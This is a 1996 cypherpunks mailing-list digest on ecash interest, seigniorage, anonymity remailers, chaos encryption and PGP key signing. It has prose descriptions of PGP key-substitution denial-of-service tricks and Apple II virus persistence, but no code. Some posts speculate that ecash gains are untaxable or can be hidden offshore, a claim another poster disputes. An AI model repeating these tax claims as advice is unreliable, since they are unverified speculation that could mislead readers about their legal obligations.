>One possible way to get around this is to have ecash issuers pay interest
>on ecash.  However it requires ecash to be timestamped and therefore
>compromises its untraceability.  (Think of the timestamp as a serial
>number.)

It wouldn't exactly have to be timestamped.  By convention, all interest 
bearing currency could be denominated as of some fixed date.  For instance, 
its future value as of Jan 1, 2200 A.D.  The issuer could then pay interest 
without knowing the date the currency was issued.  (Of course, some accounting 
rules are probably going to need changing, hehe) Neither the payee nor the 
issuer needs to know the actual issue date when settlement time comes.  

When you buy a t-bill, it is worth some amount on some date.  You don't 
know when the previous owner bought it or how much (s)he paid.  

The denominated date could even vary if it were "blinded".  
As long as the present value of the ecoin is the same, the issuing institution 
should not care how it is expressed.  A variable interest rate scheme could 
even prevent an announced fixed rate from conveying clues about the issue date.
Rick F. Hoselton  (who doesn't claim to present opinions for others)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Sun, 7 Apr 1996 18:29:30 +0800
To: cypherpunks@toad.com
Subject: Re: "Contempt" charges likely to increase
Message-ID: <199604070626.WAA10352@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 01:00 PM 4/6/96 -0500, Black Unicorn wrote:
> To me this entire thread has threatened to suggest to people that they 
> need only thumb their noses at the authorities, be it by cryptographic 
> protocol or otherwise, and sit back in their easy chair and smile to 
> themselves. [...]
>
> I understand that direct confrontation with government is appealing to 
> the authority hater.  (I happen to be one).  Overt resistance, however, 
> of the character suggested by Mr. Bell and others, is going to cause 
> problems in two ways.  Firstly, its going to cause the individual 
> resister a good deal of headaches.  Secondly, its going to make bad law 
> eventually.

On this you are simply wrong:

As Jim Bell pointed out, the current level of repression would have
been unthinkable thirty years ago, and it has occurred with very 
little actual violence.  99% pure bluff. The authorities are 
generally reluctant to risk their reputation capital by direct 
confrontation.

Government projects an image of being all powerful, but in fact they
are in the same position as the lion tamer bullying his lions or the
Mahout commanding the elephant to drag logs.

Somebody complained that the image I put in by CDA protest was not
obscene, mererly indecent (due perhaps due to the lousy dithering
which obscured certain crucial features of the image) -- so I amended
it to one which is definitely obscene.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: walter@cithe302.cithep.caltech.edu (Chris Walter)
Date: Sun, 7 Apr 1996 11:10:55 +0800
To: mlist-cypherpunks@nntp-server.caltech.edu
Subject: Re: Someone's screwing around with anon.penet.fi
In-Reply-To: <cypherpunks.Pine.BSF.3.91.960406114609.5026B-100000@kirk.edmweb.com>
Message-ID: <WALTER.96Apr6143709@cithe302.cithep.caltech.edu>
MIME-Version: 1.0
Content-Type: text/plain


In article <cypherpunks.Pine.BSF.3.91.960406114609.5026B-100000@kirk.edmweb.com> Steve Reid <steve@edmweb.com> writes:

>   Here's another one of them unsolicited messages from anon.penet.fi.

I also got one of these right after I posted to cypherpunks.  I
normally just lurk, and the address that was used is the machine I
read and post news on(we have a gateway to the mailing list).  So I am
pretty sure it is related to my posting to cypherpunks.  

I have written to the administrators at anon.penet.fi asking about this
and informing them.  I'll pass on any relevant info they send me.

-Chris
walter@cithe501.cithep.caltech.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chevelle <love5683@voicenet.com>
Date: Sun, 7 Apr 1996 16:47:52 +0800
To: cypherpunks@toad.com
Subject: Re: HANDS UP!
Message-ID: <199604070428.XAA24512@mail.voicenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Hey guys if there's anything I can do to help Kevin out anything at all
please let me know!

                                                        chevelle out....At
07:14 AM 4/5/96 +0200, THE HIJACK-CREW wrote:
>HI THERE!    THIS IS etoy! 
>
>"the digital hijack" is NOW running !
>
>the internet-underground has decided: it is definitely time to blast SOUND
>and ACTION into the net !!! 
>
>our software-agents have invaded the main searchservers...
>
>++++for more information check out : http://www.hijack.org/++++++++++
>
>or get kidnapped live --> go to infoseek (netsearch-button on your browser)
>and search for:
>
>UNDERGROUND - CENSORSHIP - DISCO - XTC - CLINTON - PORSCHE -  CRACK -
>KRAFTWERK - ELVIS - TERROR - PENTHOUSE - SEGA - MONDRIAN - SEXPISTOLS -
>FIREARMS -  TARANTINO  - DJ - STONES - NETWORKS - BASE - CRIME - WAR -
>BUSINESS - WOMEN - NET - SOCIETY - ART - CASTRO - PARADISE - ATHLETICS -
>PULP - CYBER - YELLO - PETSHOPBOYS - REM - HUSTLER - BITCH - GUEVARA -
>SEVESO - MELODYMAKER - PORNO - GABBER - ROLLERBLADES - REBEL - OASIS -
>COMMUNICATIONS - PLAYBOY - BELGIUM - ORB - AND MANY MORE...
>
>these keywords will all appear on the TOP 10 - LIST. take the link to
>hijack.org to get the hijack-experience like millions of bored
>internet-users...
>
>download the hijackers-sound, get the best pictures and help us free our
>friend KEVIN D. MITNICK, THE SUPERHACKER (charged for electronic-terrorism,
>maximum sentence: 460 years prison) !
>
>we would be very happy to welcome you on our site. spread this new
>internet-lifestyle to your friends and to internet-freaks + surfers !
>
>this is a underground art-project not a bastard-business mail. our grab
>robot "etoy.IVANA" got your email-address by cruising the net.
>
>for the hijack-crew etoy
>MARTIN KUBLI
>
>email  mailme@etoy.com
>fax ++41 1 363 35 57
>_______________________________________________________________________
>http://www.hijack.org/
>for highres-pictures: ftp.etoy.com   /press
>
>
>etoy: 
>leaving reality behind...abusing technology...flashing the net
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Patrick May <pjm@spe.com>
Date: Sun, 7 Apr 1996 19:29:58 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Unicorn of Color
In-Reply-To: <ad8bf5e226021004c1b9@[205.199.118.202]>
Message-ID: <199604070759.XAA00547@gulch.spe.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Timothy C. May writes:
[ . . . ]
 > and gladly switched to the more noble-sounding "black" in the 1960s, and
 > now I almost vomit everytime I hear some radfem lesbian claim "All wimmin
 > are people of color!!!!" Yeah, colored people. My, how the worm has
[ . . . ]

     The spelling is "wymmyn", you neanderthal oppressor.


Cypherpunks wa ango o kakimasu,

pjm


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQEVAwUBMWd16WAA81GB0e9dAQE2nAf/ZosmFkGcL/mzgkHVZWgpgrl/miz+FyrC
7rM2wwxLc0IkWmknVKRzujieOvDDImtYRLPBwLXFc4QlesTj9IKQCekfif+4qadD
flio73ELz7FEwsy3pkTJQCJ1JBSh55/3mUKdzPOed8YJb2C7aMkHauB1Mo7XdrCI
i7QXOh/Bx43/5YcSC0lqtlGcjKhQfEOcqurS+RcG5kWfnDRn2A21ejBBUjoezUuF
r04qUbUoymXY+d+zkhhHxGfFpUPfFU0E0rH9d+p8/M2mc0WQr8PAOtMgz6OyA+Uj
lknG8NXe+qExr6LkMvV1ozup3uuetpadVRV58o2kwzFBT/QirFknSQ==
=tn+1
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <pgp@lsd.com>
Date: Sun, 7 Apr 1996 20:00:07 +0800
To: cypherpunks@toad.com
Subject: LSD|CFP
Message-ID: <v03005b1cad8d2bd02332@[192.187.167.52]>
MIME-Version: 1.0
Content-Type: text/plain


All constructive comments, corrections & suggestions are greatly
appreciated... <http://www.well.com/user/ddt/crypto/crypto.html>

   dave

___________________________________________________________________
Cryptography is the entertainment branch of the computing industry.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JonWienke@aol.com
Date: Sun, 7 Apr 1996 18:10:11 +0800
To: cypherpunks@toad.com
Subject: Re: e$ seigniorage (and is this the cost of untracability?)
Message-ID: <960407011827_186212737@emout09.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Wei Dai writes:

>One possible way to get around this is to have ecash issuers pay interest
>on ecash.  However it requires ecash to be timestamped and therefore
>compromises its untraceability.  (Think of the timestamp as a serial
>number.)

Interest-bearing accounts cannot legally be anonymous--the IRS requires
records of interest payments for tax purposes.  Even if the e$ issuer is
collecting interest on my ecash, I don't care as long as they don't charge me
any fees,.  As far as I am concerned, if the issuer can make anonymous e$
worth his while to issue, the loss in potential interest income is more than
outweighed by the advantages of being able to use such a system.

Jonathan Wienke




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 7 Apr 1996 18:00:40 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Unicorn of Color
In-Reply-To: <ad8bf5e226021004c1b9@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.960407011449.27408A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 6 Apr 1996, Timothy C. May wrote:

> At 6:00 PM 4/6/96, Black Unicorn wrote:
> >On Fri, 5 Apr 1996, Timothy C. May wrote:
> 
> >>
> >> Far be it from me to question the legal advice BU/Uni/Dirsec provides,
> >
> >Unicorn is fine, don't be snide.
> 
> Not meant to be snide, even if sounded that way. I just get confused by
> your various nyms, as some call you "Uni," others call you by what I
> presume is your real name (rhymes with Galois), and you sometimes sign your
> messages "Dirsec."

Unicorn will do.  The nym, for those interested, is taken from our 
crest.  Dirsec, the username for a time, was a result of some ISP account 
shuffling.  Completely outside my control I fear.  I don't think anyone 
calls me by my name on the list, but I could be mistaken.

> Also, I am hesitant to call you "Black Unicorn," as applying the adjective
> "black" to a person is illegal in some jurisdictions, and "Unicorn of
> Color" does not ring true. (But I grew up calling blacks "colored people,"
> and gladly switched to the more noble-sounding "black" in the 1960s, and
> now I almost vomit everytime I hear some radfem lesbian claim "All wimmin
> are people of color!!!!" Yeah, colored people. My, how the worm has
> turned....)

Again, Unicorn, or uni will do.  When I adopted the nym, I never planned 
it to be a long term thing.  I'm sure I would have been more obscure had 
I given it much thought.

I'm not liberal enough to be offended by the color/evil implication of my 
nym.  The blazon of the black unicorn has been with my family a long 
time.  I'd hardly consider it an offense, though I understand the 
caution.

> 
> Hope this clears things up.
>

It does, thanks.

> --Tim
> 
> 
> Boycott "Big Brother Inside" software!
> We got computers, we're tapping phone lines, we know that that ain't allowed.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
> Higher Power: 2^756839 - 1  | black markets, collapse of governments.
> "National borders aren't even speed bumps on the information superhighway."
> 

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Magnus Y Alvestad <magnus@ii.uib.no>
Date: Sun, 7 Apr 1996 13:24:27 +0800
To: Steve Reid <steve@edmweb.com>
Subject: Re: Someone's screwing around with anon.penet.fi
In-Reply-To: <Pine.BSF.3.91.960406114609.5026B-100000@kirk.edmweb.com>
Message-ID: <evpw9kq1z3.fsf@vipe.ii.uib.no>
MIME-Version: 1.0
Content-Type: text/plain


| I have a feeling lots of people on the Cypherpunks list are going to
l be getting these... My first post to the list was only about two
| days ago, and someone's already messing around. :(

Something like that.

No doubt, someone is subscribed to the cypherpunks list with an
anonymous account on anon.penet.fi - of the an???? variant.  When you
posted to the cypherpunks list, your posting was sent to this
account.

Now, an???? accounts are supposed to be anonymized both ways, which
means that when anon.penet.fi recieved your message, it anonymized it
and assigned you an anon id.

The nasty consequence is that the receiver can easily find the
correspondence between your real and anon id, even if it wasn't
generated just now.

I thought there was some kind of mechanism on anon.penet.fi to prevent
this, but it seems not.

-Magnus





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: erc@dal1820.computek.net
Date: Sun, 7 Apr 1996 19:30:00 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] Unicorn of Color
Message-ID: <199604070845.EAA28473@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text/plain


No, it's "womyn", you Fascist male oppressor pretending to be in sympathy with the cause ;)
______________________________ Reply Separator _________________________________
Subject:  [NOISE] Unicorn of Color
Sent To:  cypherpunks@toad.com
Author:   pjm@spe.com
Reply To: pjm@spe.com
Date:     4/7/96 1:36:53 AM

     The spelling is "wymmyn", you neanderthal oppressor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Mon, 8 Apr 1996 00:45:11 +0800
To: rick hoselton <hoz@univel.telescan.com>
Subject: Re: the cost of untracability?
In-Reply-To: <199604070539.VAA27922@toad.com>
Message-ID: <Pine.SUN.3.92.960407052217.24243B-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 6 Apr 1996, rick hoselton wrote:

> It wouldn't exactly have to be timestamped.  By convention, all interest
> bearing currency could be denominated as of some fixed date.  For instance,
> its future value as of Jan 1, 2200 A.D.  The issuer could then pay interest
> without knowing the date the currency was issued.  (Of course, some accounting
> rules are probably going to need changing, hehe) Neither the payee nor the
> issuer needs to know the actual issue date when settlement time comes.
>
> When you buy a t-bill, it is worth some amount on some date.  You don't
> know when the previous owner bought it or how much (s)he paid.
>
> The denominated date could even vary if it were "blinded".
> As long as the present value of the ecoin is the same, the issuing institution
> should not care how it is expressed.  A variable interest rate scheme could
> even prevent an announced fixed rate from conveying clues about the issue date.

I think you're right.  There is no need for the issuer to pay explicit
interest.  The easiest way to eliminate signorage would be to steadily
increase the value of each denomination of ecash.  It would be kind of
like a mutual fund that doesn't pay dividends.  In fact, if the ecash is
backed by a portfolio of investment securities and its value floats with
the value of the portfolio, then it would be almost exactly like a mutual
fund.

Of course, as Jonathan Wienke pointed out, the IRS would not be very happy
about this.  Then again, the IRS would not be happy with a lot of the
technology discussed on this list.

Wei Dai






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 8 Apr 1996 06:08:06 +0800
To: Wei Dai <hoz@univel.telescan.com>
Subject: Re: the cost of untracability?
Message-ID: <m0u5yIb-0008z6C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:30 AM 4/7/96 -0700, Wei Dai wrote:

>I think you're right.  There is no need for the issuer to pay explicit
>interest.  The easiest way to eliminate signorage would be to steadily
>increase the value of each denomination of ecash.  It would be kind of
>like a mutual fund that doesn't pay dividends.  In fact, if the ecash is
>backed by a portfolio of investment securities and its value floats with
>the value of the portfolio, then it would be almost exactly like a mutual
>fund.
>
>Of course, as Jonathan Wienke pointed out, the IRS would not be very happy
>about this.  Then again, the IRS would not be happy with a lot of the
>technology discussed on this list.

Some more than others, huh?  B^)

FWIW, I think that there is no capital-gains-type tax on currency 
conversions.  In other words, if I take dollars and buy yen today, and the 
interconvert rate changes and I convert back and make a "profit," that is 
not considered income.  If that's the case, then ecash has an excellent 
precedent behind it to avoid any taxes on interest, especially if that 
interest is, in effect, paid by increasing the inherent value of the currency.

And most of the "interest" will simply be the avoided inflation loss that 
would have otherwise occurred.  Buying ecash may be equivalent to buying an 
absolutely non-inflating currency that the government can't manipulate.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathon Blake <grafolog@netcom.com>
Date: Mon, 8 Apr 1996 04:17:44 +0800
To: JonWienke@aol.com
Subject: Re: e$ seigniorage (and is this the cost of untracability?)
In-Reply-To: <960407011827_186212737@emout09.mail.aol.com>
Message-ID: <Pine.3.89.9604070949.A1206-0100000@netcom3>
MIME-Version: 1.0
Content-Type: text/plain


	Jonathan:

On Sun, 7 Apr 1996 JonWienke@aol.com wrote:

> Interest-bearing accounts cannot legally be anonymous--the IRS requires

	To quote TCMay:
	National boundaries aren't even speedbumps on the information
	highway.

	Who says the e$ has to be based in the US?

	Andorra, Liechenstein, San Marino, St Pierre, all come 
	to mind as countries to investigate, because they are 
	outside of the United States.  << Has St Pierre joined
	NAFTA? If so, that rules them out.  >> 

        xan

        jonathon
        grafolog@netcom.com




**********************************************************************
*								     *
*	Opinions expressed don't necessarily reflect my own views.   *
*								     *
*	There is no way that they can be construed to represent      *
*	any organization's views.				     *
*								     *
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
*	ftp://ftp.netcom.com/pub/gr/graphology/home.html	     *
*								     *
***********************************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Mon, 8 Apr 1996 04:39:22 +0800
To: cypherpunks@toad.com
Subject: Re: NYT: Chaotic Encryption: a Solution in Search of a Problem
In-Reply-To: <2.2.32.19960407061512.0034fb58@sdcc10.ucsd.edu>
Message-ID: <Pine.LNX.3.92.960407113537.158A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 6 Apr 1996, Dan Haskovec wrote:

> The New York Times online site reports on a researcher at Oak Ridge National
> Labs who "devised and patented a new mathematical system for encrypting and
> authenticating digital data, based on the scientific concept of chaos."  The
> article mention that people in industry were less than enthused about
> adopting it.  Even the inventor says that it "isn't robust enough for
> military applications."  It seems to use a chaotic system at both ends with
> a symmetric key.  It almost sounds like the NYT covered it because chaos is
> "cool", not because this development is significant.  Any insights?

There has been research into developing chaos based encryption, but none of
the systems developed are nearly as strong as block ciphers such as IDEA and
3DES.  Chaos encryption is more like steganography than encryption.
The chaos encryption schemes that I know of use a driving circuit to generate
the carrier wave for the transmission.  If a person on the other end knows the
driving circuit used, then that person can remove it.  The output of a chaos
encryption mechanism is similar to static, but I don't think that it is
particularly strong.  With proven strong encryption, the only advantage I can
see to using chaos encryption would be to encrypt analog data.

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xf9b22ba5
http://www.voicenet.com/~markm/ | bd24d08e3cbb53472054fa56002258d5
"The concept of normalcy is just a conspiracy of the majority" -me

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMWfiZrZc+sv5siulAQEwcAQAq8Sp1o6bkxAbZwEpKf3TZjcLP6q1AP7h
4/YIVDVZamfQ8BUtji1r/jFAJLviPF1ibC8459L9+Q4GlDzSBEpYA5gHjIywyg61
3iv86ZwTy2xijPkINWSnlDF04FiMwmBuTC91hS/9DiSYQ6dQZWxy8L2LZkaJb57v
5Qds6rfBFRM=
=aLiN
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 8 Apr 1996 04:53:32 +0800
To: cypherpunks@toad.com
Subject: Re: e$ Signorage
Message-ID: <199604071620.MAA14286@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



I misdirected this yesterday. Yes, its relevant: it answers the
contention that ecash somehow lowers government seignorage income.

------- Forwarded Message

To: James Gleick <gleick@around.com>
cc: cypherpunk@toad.com
Subject: Re: e$ Signorage 
From: "Perry E. Metzger" <perry@jekyll.piermont.com>


James Gleick writes:
> >> It's not obvious, but it's true, that the Fed collects the "float"
> >> on dollar bills you carry in your pocket,
> >
> >Oh, really? From whom? First I've heard of this.
> 
> Then you're learning something new.

Oh, really? Don't teach grampaw to suck eggs.

> On the contrary. The Federal Reserve holds Government securities
> corresponding to the dollar value of currency in circulation.

Ah, no. Sorry.

The Fed does indeed monetize debt, but 1) that isn't related to
seignorage, and 2) all new money is monetized debt, and it makes no
difference whether it is held in paper or bank accounts or anything
else.

> It earns interest income on this amount, and returns this income to
> the Treasury. This is called seigniorage. It amounts this year to
> something over $20 billion.  This is a very real issue. To the
> extent that electronic money replaces currency (reduces the amount
> in circulation), it will cost the Treasury seigniorage- -and the
> Government is acutely aware of this. Whether the beneficiaries are
> consumers, banks, or other issuers of digital cash will depend on
> the system.

Again, you really don't know what you are talking about.

The vast bulk of the money in the field is not currency. Most of it is
in the form of bank deposits and is circulated through bank mechanisms
like checks and such.

When the Fed wants to expand the money supply, it buys government debt
on the open market, paying for it with nothing at all other than
changing numbers in the Fed's computers. This is how debt is
monetized. The bulk of that money never becomes dollar bills, and
whether it is circulated via checks or ecash or direct deposit or
whatever makes no difference to the amount of fake interest earned. I
say "fake interest" because it isn't real income to the government at
all.

The amount of currency in circulation is dependant purely on demand by
consumers, via banks, for currency. When banks want dollar bills, they
ask the Fed -- they hand the fed electronic money and the fed gives
them back dollar bills. The amount of currency, however, has nothing
to do with the amount of bonds being held -- whether the monetized
debt is held in bank accounts, in dollar bills, or in ecash makes
absolutely no difference.

Again, you just don't know what you are talking about. E-Cash has no
impact on the fake interest earned by the fed, which is not seignorage
to begin with.


Perry

------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@ACM.ORG>
Date: Mon, 8 Apr 1996 08:25:12 +0800
To: cypherpunks@toad.com
Subject: Re: the cost of untracability?
In-Reply-To: <m0u5yIb-0008z6C@pacifier.com>
Message-ID: <199604071953.MAA03973@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



jim bell <jimbell@pacifier.com> writes:
>FWIW, I think that there is no capital-gains-type tax on currency 
>conversions.  In other words, if I take dollars and buy yen today, and the 

I bounced this off a CPA, who said she would be very suprised if this is
really the case: in general the IRS considers increases in wealth to be
taxable, and unless there's a specific exclusion for currency transactions
that she doesn't know about, she suspects this is not the case.  As a
conceptual counterexample she points out that you are responsible for any
profit you make from selling your car for more than you pay for it (but,
as you might expect, you don't get to take a loss if you sell it for less).

>interconvert rate changes and I convert back and make a "profit," that is 
>not considered income.  If that's the case, then ecash has an excellent 
>precedent behind it to avoid any taxes on interest, especially if that
>interest is, in effect, paid by increasing the inherent value of the
>currency.

My tame CPA also volunteered the information that the IRS is very interested
and concerned about how they're going to capture transaction information for
electronic transactions, and they do think it's in their bailiwick... she's
read some articles on it.

	Jim Gillogly
	17 Astron S.R. 1996, 19:52




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Mon, 8 Apr 1996 05:14:08 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Unicorn of Color
Message-ID: <199604071702.NAA23833@pipe6.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Apr 06, 1996 11:57:33, 'tcmay@got.net (Timothy C. May)' wrote: 
 
 
> 
>Also, I am hesitant to call you "Black Unicorn," as applying the adjective

>"black" to a person is illegal in some jurisdictions, and "Unicorn of 
>Color" does not ring true. (But I grew up calling blacks "colored people,"

>and gladly switched to the more noble-sounding "black" in the 1960s, and 
>now I almost vomit everytime I hear some radfem lesbian claim "All wimmin 
>are people of color!!!!" Yeah, colored people. My, how the worm has 
>turned....) 
> 
 
Don't go Grubor on us now Tim. Slip over the border and get some downers to
handle the delusion of "some jurisdictions" that make it "illegal" to call
someone "black." 
 
Your gorge is also a lot more steady than you think, so I wouldn't worry
about it. If you can choke down nuclear bombings of civilians, surely you
can handle the new "private dictionaries" of a few radical feminists who
spell "adult female" w-i-m-m-i-n. 
 
--tallpaul 
 
PS: I identify with that section of the women's liberation movement who
spell a different word b-y-t-c-h.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@kampai.euronet.nl>
Date: Mon, 8 Apr 1996 00:45:13 +0800
To: cypherpunks@toad.com
Subject: Re: e$ seigniorage (and is this the cost of untracability?)
Message-ID: <199604071315.PAA18136@kampai.euronet.nl>
MIME-Version: 1.0
Content-Type: text/plain


Wei Dai wrote:
> 
> On Sat, 6 Apr 1996, Gary Howland wrote:
> 
> >     - What will be the typical time between the withdrawal of ecash
> >         and it being deposited?
> 
> I think this will depend on how easy it is to withdraw ecash.  If the
> client software includes an option of automaticly withdrawing ecash from
> the bank when you don't have enough ecash to pay for the current purchase
> (thereby reducing the time between withdrawal and deposit to zero), then I
> suspect most people will use it, even though (anticipating your next
> question) this compromises their untraceability.

Interesting note - I think that if the time between withdrawal and deposit
ever reaches zero, then we have a e-cheque system (which is fully traceable).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rollo@artvark.com (Rollo Silver)
Date: Mon, 8 Apr 1996 11:19:36 +0800
To: norm@netcom.com (Norman Hardy)
Subject: Why sign pubkey?
Message-ID: <v02130500ad8dc7aab49a@[198.59.115.161]>
MIME-Version: 1.0
Content-Type: text/plain


                   Why You Should Sign Your PGP Public Key
                    Francis Litterio (franl@world.std.com)

If you generate a public/private key-pair and distribute the public key
without any signatures on it, you are open to a denial of service attack.
Here's how the attack works. I take your unsigned public key, and (using a
suitably powerful editor, such as Emacs) I edit the userid string so that it
still has your name but my email address on it. Then I distribute this fake
key widely. Anyone who uses the fake key to encrypt email to you will send
the email to me instead (if she uses the email address in the key). Of
course, I won't be able to decrypt the email I receive, because it was
encrypted with your public key, but I have denied you the option of
decrypting it. You might never know the message was even sent.

If you have at least one signature on your public key, PGP detects the
tampering of the userid string and alerts the person who is sending you
encrypted email. This is possible because of the nature of a digital
signature. A digital signature is the output of a cryptographically secure
hash function taking as input your RSA public key and your userid string
(among other things). That hash output value is encrypted with the private
key of the signer. If you have a valid public key from the signer and if you
trust the signer to sign other people's keys, then PGP allows you to infer a
certain degree of trust that the signed key belongs to the person named in
the key's userid field.

A cryptographically secure hash function is an irreversable hash function
for which it is computationally infeasible to find an input message that
hashes to a given output value. A task is computationally infeasible if the
sun will have burned out before even the most powerful computer could finish
the task. This prevents people from forging digital signatures.

                       -------------------------------

                       How to Sign Your PGP Public Key

You should sign your PGP public key immediately after generating your
public/private key-pair. To sign your own public key, type this:

     pgp -ks <userid>

where <userid> is the userid attached to your just-generated public key. If
you have more than one userid on your public key, then you should sign each
one individually.

                       -------------------------------

                      Misconceptions About Signed Keys

A widespread misconception about self-signed public keys (i.e., keys that
have been signed by their corresponding private keys) is that a self-signed
key is somehow more valid than a key that is not self-signed. A self-signed
key is no more valid than a key with no signatures at all. Why? Suppose you
have a public key with this userid string:

     John Q. Public <jqp@somewhere.com>

Here's my denial of service attack. I use PGP to generate a new
public/private key-pair with the same userid string as your public key but
having different RSA public key bits. I self-sign that public key with its
private half. I distribute that public key widely. Someone thinks it's yours
based on the userid string. She makes the mistake of concluding that it is
your key because it is self-signed. This is the mistake of inferring
validity merely from the presence of a self-signature. She uses it to
encrypt email to you, but you will not be able to decrypt that mail.

This is a different kind of denial of service attack than the one described
earlier (see Why You Should Sign Your PGP Public Key above). The only
defense against this attack (that I can think of) is to be ever-vigilent for
public keys that have your userid string but a different key-id and
key-fingerprint.

The key-id is the 32 least-significant bits of your RSA modulus, which is
one of the two numbers that make up your RSA public key. The other number is
the RSA public exponent (see the mathematical guts of RSA encryption for
more details).

The key fingerprint is a cryptographically secure hash of the RSA modulus
and RSA public exponent, which together make up your public key. The
cryptographically secure hash function is Ron Rivest's MD5, which outputs a
128-bit (16-byte) number, which depends in no discernable way on every bit
in its input. It is much easier for two people to compare a 16-byte
hexadecimal value over the phone that it is for them to compare the many
hundreds or thousands of bits that compose the modulus and public exponent.
If an RSA public key were tampered with in transmission from one person to
another, comparing the fingerprints (via a tamperproof communication
channel) would certainly reveal the tampering.

The moral of this story is that you should regularly verify that the
fingerprints of distributed copies of your PGP public keys (such as those in
the PGP keyserver databases) match the fingerprints of your copies of those
keys.


                                         Rollo






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iang@cs.berkeley.edu (Ian Goldberg)
Date: Mon, 8 Apr 1996 12:51:21 +0800
To: cypherpunks@toad.com
Subject: Re: Was Cohen the first?
In-Reply-To: <35960405162553/0005514706DC3EM@MCIMAIL.COM>
Message-ID: <4k9hog$buj@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


In article <199604070321.TAA02171@myriad>,
Matthew Ghio  <ghio@myriad.alias.net> wrote:
>Despite this, the Apple II never became a popular virus-writing platform.
>There are several possible reasons for this, but one of the main ones is
>that few Apple II users had hard disks.  On the IBM PC, it was easy for a
>virus to get on the hard disk, then systematically infect every floppy disk
>put into the system.  Apple II users, in contrast, often booted from
>floppies, and often rebooted when switching to a different software package,
>thus purging the virus from memory.  (Pressing control-reset on the Apple II
>keyboard would always pull the reset line on the CPU, so it wasn't possible
>to trap the interrupt like it is possible to trap ctrl-alt-del on the PC.)

Not true.  Pressing ctrl-reset jumped to the interrupt routine pointed
to by the vector at (I think) 1010/1011, if the contents of that vector
checksummed correctly with the contents of the next byte (1012), and
otherwise reset the computer.  It certainly was possible (and useful)
to trap ctrl-reset.  Also, even when a reset occurred, not all of the
memory was cleared, so you could in fact keep code in memory across
a reset, if you could arrange to have it run on the other side of the
boot.

As you pointed out, it was very easy to write viruses for the Apple ][.
The "slave" disk layout contained two blank sectors (.5 K) within the
DOS image that get loaded into memory.  The designers may as well have
labelled it "put virus here".

   - Ian "Been there; done that..."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 8 Apr 1996 14:31:54 +0800
To: cypherpunks@toad.com
Subject: Re: the cost of untracability?
Message-ID: <m0u65hy-0008ynC@pacifier.com>
